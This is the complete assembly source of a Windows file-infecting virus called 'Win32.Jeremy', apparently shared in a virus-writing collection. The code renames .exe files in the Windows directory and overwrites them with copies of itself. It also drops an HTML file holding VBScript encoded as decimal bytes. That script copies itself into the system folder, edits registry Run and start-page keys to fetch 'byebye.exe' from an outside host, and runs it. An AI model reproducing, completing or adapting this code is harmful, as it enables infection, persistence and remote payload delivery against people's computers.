Contribution - Win32.Jeremy    [by Necronomikon]

  

;********************************
;******** Win32.Jeremy **********
;(c)by Necronomikon /ZeroGravity
;********************************
;Written for one of my real friends who,died through an car accident..... :(
;
;In memories for:
;-----------------
;Jeremy Stephan Garcia
;* 17.05.1984
;+ 08.04.2004

.586p
.model flat
JUMPS

.data

handle1		db	50 	dup(0)
handle2		db	50 	dup(0)
maska		db	'*.exe',0
zgrext		db	'dat.',0
handle_		dd	0
_handle		dd	0
filedta:
FileAttributes	dd	0
CreationTime 	db	8	dup(0)
LastAccessTime	db	8	dup(0)
LastWriteTime	db	8	dup(0)
nFileSizeHigh	dd	0
nFileSizeLow	dd	0
dwReserved0	dd	0
dwReserved1	dd	0
nFileName	db	50	dup('N')
nAltFileName	db	14	dup(0)
newfilename	db	50	dup(0)
path2		db	25	dup(0)
path3		db	260	dup(0)


szTitle         db      "*** Win32.Jeremy ***",0
szMessage       db      "*****************************************************************************",13,10
                db      "**Written for one of my friends,who died through an car accident**",13,10
                db      "*****************************************************************************",13,10
                db      "**                    (c) by Necronomikon / ZeroGravity                      **",13,10
                db      "*****************************************************************************",0


;dropme
htm_handle      dd ?
htmdropper  	db      '\jeremy.htm', 0
szhtm		db 	220 dup (0)

htm_ db 60,104,116,109,108,62,13,10,13,10,60,98,111,100,121,32
db 98,103,99,111,108,111,114,61,34,98,108,97,99,107,34,32
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,118
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,97
db 108,105,110,107,61,34,35,102,102,48,48,48,48,34,32,116
db 101,120,116,61,108,105,109,101,62,13,10,60,99,101,110,116
db 101,114,62,13,10,60,98,114,62,13,10,60,102,111,110,116
db 32,115,105,122,101,61,43,50,62,60,117,62,60,98,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,56
db 48,70,70,34,62,87,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,56,67,69
db 56,34,62,105,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,57,55,68,49,34
db 62,110,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,65,51,66,57,34,62,51
db 60,47,102,111,110,116,62,60,102,111,110,116,32,99,111,108
db 111,114,61,34,35,48,48,65,69,65,50,34,62,50,60,47
db 102,111,110,116,62,60,102,111,110,116,32,99,111,108,111,114
db 61,34,35,48,48,66,65,56,66,34,62,46,60,47,102,111
db 110,116,62,60,102,111,110,116,32,99,111,108,111,114,61,34
db 35,48,48,67,53,55,52,34,62,74,60,47,102,111,110,116
db 62,60,102,111,110,116,32,99,111,108,111,114,61,34,35,48
db 48,68,49,53,68,34,62,101,60,47,102,111,110,116,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,68
db 67,52,54,34,62,114,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,69,56,50
db 69,34,62,101,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,70,51,49,55,34
db 62,109,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,70,70,48,48,34,62,121
db 60,47,102,111,110,116,62,60,47,102,111,110,116,62,60,47
db 117,62,60,98,114,62,60,98,114,62,60,98,114,62,13,10
db 60,116,105,116,108,101,62,46,46,46,97,110,100,32,111,110
db 99,101,32,97,103,97,105,110,32,111,110,101,32,111,102,32
db 109,121,32,112,97,108,115,46,46,46,33,63,60,47,116,105
db 116,108,101,62,13,10,60,102,111,110,116,32,115,105,122,101
db 61,45,49,32,99,111,108,111,114,61,119,104,105,116,101,62
db 43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,60
db 98,114,62,60,98,114,62,13,10,87,114,105,116,116,101,110
db 32,102,111,114,32,111,110,101,32,111,102,32,109,121,32,102
db 114,105,101,110,100,115,32,119,104,111,32,100,105,101,100,32
db 116,104,114,111,117,103,104,32,97,110,32,99,97,114,32,97
db 99,99,105,100,101,110,116,13,10,60,98,114,62,60,98,114
db 62,13,10,40,99,41,111,100,101,100,32,105,110,32,71,101
db 114,109,97,110,89,32,50,111,111,52,60,98,114,62,60,98
db 114,62,98,121,32,78,101,99,114,111,110,111,109,105,107,111
db 110,47,90,101,114,111,71,114,97,118,105,116,121,60,98,114
db 62,13,10,60,98,114,62,60,98,114,62,60,47,102,111,110
db 116,62,13,10,60,83,99,114,105,112,116,32,76,97,110,103
db 117,97,103,101,61,118,98,115,62,13,10,114,101,109,32,119
db 105,110,51,50,46,106,101,114,101,109,121,13,10,114,101,109
db 32,40,99,41,32,98,121,32,78,101,99,114,111,110,111,109
db 105,107,111,110,47,90,71,13,10,83,101,116,32,100,111,119
db 110,108,111,97,100,101,114,32,61,32,67,114,101,97,116,101
db 79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46
db 83,104,101,108,108,34,41,13,10,100,111,119,110,108,111,97
db 100,101,114,46,114,101,103,119,114,105,116,101,32,34,72,75
db 67,85,92,115,111,102,116,119,97,114,101,92,119,105,110,51
db 50,74,101,114,101,109,121,92,34,44,32,34,40,99,41,98
db 121,32,78,101,99,114,111,110,111,109,105,107,111,110,47,90
db 101,114,111,71,114,97,118,105,116,121,34,13,10,83,101,116
db 32,74,101,114,101,109,121,61,32,67,114,101,97,116,101,111
db 98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103
db 46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99
db 116,34,41,13,10,74,101,114,101,109,121,46,99,111,112,121
db 102,105,108,101,32,119,115,99,114,105,112,116,46,115,99,114
db 105,112,116,102,117,108,108,110,97,109,101,44,74,101,114,101
db 109,121,46,71,101,116,83,112,101,99,105,97,108,70,111,108
db 100,101,114,40,48,41,38,95,13,10,34,92,106,101,114,101
db 109,121,46,118,98,115,34,13,10,90,71,114,97,118,105,116
db 121,61,32,34,34,13,10,90,71,114,97,118,105,116,121,61
db 32,100,111,119,110,108,111,97,100,101,114,46,114,101,103,114
db 101,97,100,40,34,72,75,67,85,92,83,111,102,116,119,97
db 114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116
db 101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,68
db 111,119,110,108,111,97,100,32,68,105,114,101,99,116,111,114
db 121,34,41,13,10,73,102,32,40,90,71,114,97,118,105,116
db 121,61,32,34,34,41,32,84,104,101,110,13,10,90,71,114
db 97,118,105,116,121,32,61,32,34,99,58,34,13,10,69,110
db 100,32,73,102,13,10,73,102,32,82,105,103,104,116,40,90
db 71,114,97,118,105,116,121,44,32,49,41,32,61,32,34,32
db 92,32,34,32,84,104,101,110,32,90,71,114,97,118,105,116
db 121,32,61,32,77,105,100,40,90,71,114,97,118,105,116,121
db 44,32,49,44,32,76,101,110,40,90,71,114,97,118,105,116
db 121,41,32,45,32,49,41,13,10,73,102,32,78,111,116,32
db 40,74,101,114,101,109,121,46,102,105,108,101,101,120,105,115
db 116,115,40,74,101,114,101,109,121,46,103,101,116,115,112,101
db 99,105,97,108,102,111,108,100,101,114,40,48,41,32,38,32
db 34,92,98,121,101,98,121,101,46,101,120,101,34,41,41,32
db 84,104,101,110,13,10,73,102,32,78,111,116,32,40,74,101
db 114,101,109,121,46,102,105,108,101,101,120,105,115,116,115,40
db 90,71,114,97,118,105,116,121,32,38,32,34,92,98,121,101
db 98,121,101,46,101,120,101,34,41,41,32,84,104,101,110,13
db 10,100,111,119,110,108,111,97,100,101,114,46,114,101,103,119
db 114,105,116,101,32,34,72,75,67,85,92,83,111,102,116,119
db 97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110
db 116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92
db 77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34
db 44,95,13,10,34,104,116,116,112,58,47,47,119,105,110,51
db 50,106,101,114,101,109,121,46,116,114,105,112,111,100,46,99
db 111,109,47,98,121,101,98,121,101,46,101,120,101,34,13,10
db 100,111,119,110,108,111,97,100,101,114,46,114,101,103,119,114
db 105,116,101,32,34,72,75,69,89,95,67,85,82,82,69,78
db 84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92
db 77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119
db 115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110
db 92,82,85,78,34,44,95,13,10,74,101,114,101,109,121,46
db 103,101,116,115,112,101,99,105,97,108,102,111,108,100,101,114
db 40,48,41,32,38,32,34,92,98,121,101,98,121,101,46,101
db 120,101,34,13,10,69,108,115,101,13,10,100,111,119,110,108
db 111,97,100,101,114,46,114,101,103,119,114,105,116,101,32,34
db 72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69
db 82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111
db 115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120
db 112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114
db 116,32,80,97,103,101,34,44,95,13,10,34,97,98,111,117
db 116,58,98,108,97,110,107,34,13,10,74,101,114,101,109,121
db 46,99,111,112,121,102,105,108,101,32,90,71,114,97,118,105
db 116,121,32,38,32,34,92,98,121,101,98,121,101,46,101,120
db 101,34,44,95,13,10,74,101,114,101,109,121,46,103,101,116
db 115,112,101,99,105,97,108,102,111,108,100,101,114,40,48,41
db 32,38,32,34,92,98,121,101,98,121,101,46,101,120,101,34
db 13,10,100,111,119,110,108,111,97,100,101,114,46,114,117,110
db 32,74,101,114,101,109,121,46,103,101,116,115,112,101,99,105
db 97,108,102,111,108,100,101,114,40,48,41,32,38,32,34,92
db 98,121,101,98,121,101,46,101,120,101,34,44,32,49,44,32
db 70,97,108,115,101,13,10,101,110,100,32,105,102,13,10,60
db 47,115,99,114,105,112,116,62,13,10,60,47,66,79,68,89
db 62,13,10,60,47,104,116,109,108,62,13,10,13,10,0



script_size2		equ $-htm_

_off_   equ 2722d
include useful.inc

.code

api macro a
extrn a:proc
call a
endm

jeremy:

push    00000000h                       ; Parameters for MessageBoxA
push    offset szTitle
push    offset szMessage
push    00000000h
api    MessageBoxA

real:
push	00000001
push	offset nFileName
api	WinExec

push	offset path3
push	260
api	GetCurrentDirectoryA

push 	25
push 	offset path2
api 	GetWindowsDirectoryA

push	offset path2
api	SetCurrentDirectoryA

push	offset	handle1
api	GetModuleHandleA

push 	50
push 	offset handle2
push 	eax
api	GetModuleFileNameA

push	offset filedta
push	offset maska
api	FindFirstFileA

mov	dword ptr [handle_],eax
cmp	eax,	0
je	@@dropfile ;        <-------------

check:
mov	bx,	word ptr[nFileName]
cmp	bx,	'J'
je	nextfile
cmp	bx,	'E'
je	nextfile
cmp	bx,	'R'
je	nextfile
cmp	bx,	'E'
je nextfile
cmp	bx,	'M'
je	nextfile
cmp	bx,	'Y'
je	nextfile

lea	esi,	[nFileName]
lea	edi,	[newfilename]

stowit:
lodsb
cmp	al,	'.'
je	addext
stosb
jmp	stowit

addext:
stosb
lea	esi,	[zgrext]
movsw
movsw
push	0
push	offset newfilename
push	offset nFileName
api	MoveFileA
;api  lstrcat
push	0
push	offset nFileName
push	offset handle2
api	CopyFileA

push	2
push	offset nFileName
api	CreateFileA

mov	dword ptr [_handle],eax

push	dword 0
push       0
push	_off_
push	eax
api	SetFilePointer

mov	eax,	dword ptr [_handle]

push	50
push	offset newfilename
push	eax
api	WriteFile

push	eax
api	_lclose
jmp nextfile
je real

@@dropfile:
   push 50
   push offset szhtm
   api GetWindowsDirectoryA

   push offset htmdropper
   push offset szhtm
   api lstrcat

   push	0
   push	offset szhtm
   api	_lcreat
   mov  [htm_handle],eax

   push	script_size2
   push	offset htm_
   push	[htm_handle]
   api _lwrite

   push	[htm_handle]
   api	_lclose

   push	0
   push	edi
   api	WinExec


 nextfile:

	push	offset filedta
	mov	eax,	dword ptr [handle_]
	push	eax
	api	FindNextFileA
	cmp	eax,	0
        je      @@dropfile      ; <-----------------
	jmp	check


bailout:
push	0
api	ExitProcess

end jeremy